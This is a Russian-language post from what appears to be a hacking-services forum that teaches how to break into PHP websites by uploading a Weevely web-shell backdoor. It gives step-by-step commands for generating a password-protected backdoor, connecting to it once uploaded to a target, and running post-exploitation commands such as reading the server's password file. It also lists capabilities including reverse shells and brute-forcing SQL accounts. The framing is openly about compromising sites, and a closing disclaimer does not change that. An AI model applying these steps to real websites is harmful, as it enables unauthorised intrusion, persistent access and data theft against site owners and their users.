Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Этот пост о взломе веб-сайтов с помощью бэкдора. Сегодня мы узнаем, как взломать веб-сайт с помощью оболочки PHP-бэкдора. Weevely - это инструмент, который помогает внедрить бэкдор в любой веб-сайт PHP.

Мы загружаем на веб-сайт файл, такой как: документ, PDF-файл и изображение, и вы можете загрузить собственную PHP-страницу на веб-сайт. Этот инструмент обнаружит слабые места в вашей цели, если сайт уязвим, вы можете загрузить на веб-сайт любую вещь. Если мы загружаем тип вредоносного ПО Дело в том, что это вред целевому сайту. как взломать сайт с помощью бэкдора PHP.

Что такое бэкдор?

В Ethical hacking Hacking и Cyber ​​Security Worldбэкдор - это метод, с помощью которого злоумышленник получает доступ к любому компьютеру, веб-сайту и т.д. без их разрешения.

Что такое Weevely?

Wevely - это веб-программное обеспечение, которое предоставляет веб-оболочку PHP, которая загружается на веб-сайт и запускается бэкдор. Помните, что это работает на веб-сайте написанным на PHP, их миллион веб-сайтов в мире имеет серверную часть PHP.

Функции:

  • Доступ к оболочки цели

  • SQL console pivoting on the target

  • Прокси-сервер HTTP / HTTPS для просмотра цели

  • Загружать и скачивать файлы

  • Создавать обратные и прямые TCP-оболочки

  • Аудит безопасности удаленного целевого объекта

  • Сканирование портов цели

  • Сканирование удалённой файловой системы

  • Brutforce учётных записей SQL

Инструмент Weevely уже установлен в Kali Linux Os. Если вы используете другую платформу, используйте следующую команду для установки

git clone https://github.com/eppina/weevely3

Прежде всего, откройте терминал для машин Kali и введите «weevely».

 

 

Wevely покажите нам информацию для типа помощи «weevely –help»

 

 

Эта команда показывает нам, как работать в трёх режимах.

generate

terminal

session

Как создать бэкдор

Теперь мы создаем бэкдор для нашего целевого веб-сайта, введите следующую команду

weevely generate [ backdoor password ] [ path and name of backdoor]

Сначала мы создаем бэкдор для целевого сайта.

weevely generate 12345 /root/Desktop/backdoor

 

 

Наконец, мы успешно сгенерировали бэкдор. Из-за проблем с безопасностью (своей) я не могу показать вам на практике, как внедрить бэкдор, я расскажу вам всю рабочую схему, которая будет использоваться для создания сеанса, загрузите бэкдор PHP на ваш целевой веб-сайт.

Когда мы успешно загрузили бэкдор, теперь пришло время выполнить активацию бэкдора, введите следующую команду

weevely password of backdoor ]

например:

weevely http://192.168.1.109/dvwa/hackable/uploads/hackers-arise-backdoor.php 12345

 

Он успешно выполнен, в результате наша оболочка PHP откроется автоматически.

Введите команду «help» и посмотрите, что мы можем сделать.

По очереди введите следующую команду:

system-info

audit-etcpasswd

Наконец, мы загружаем файл PHP на веб-сайт и запускаем этот файл с помощью инструмента Wevely.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,329
    Total Members
    30,834
    Most Online
    konstant777
    Newest Member
    konstant777
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.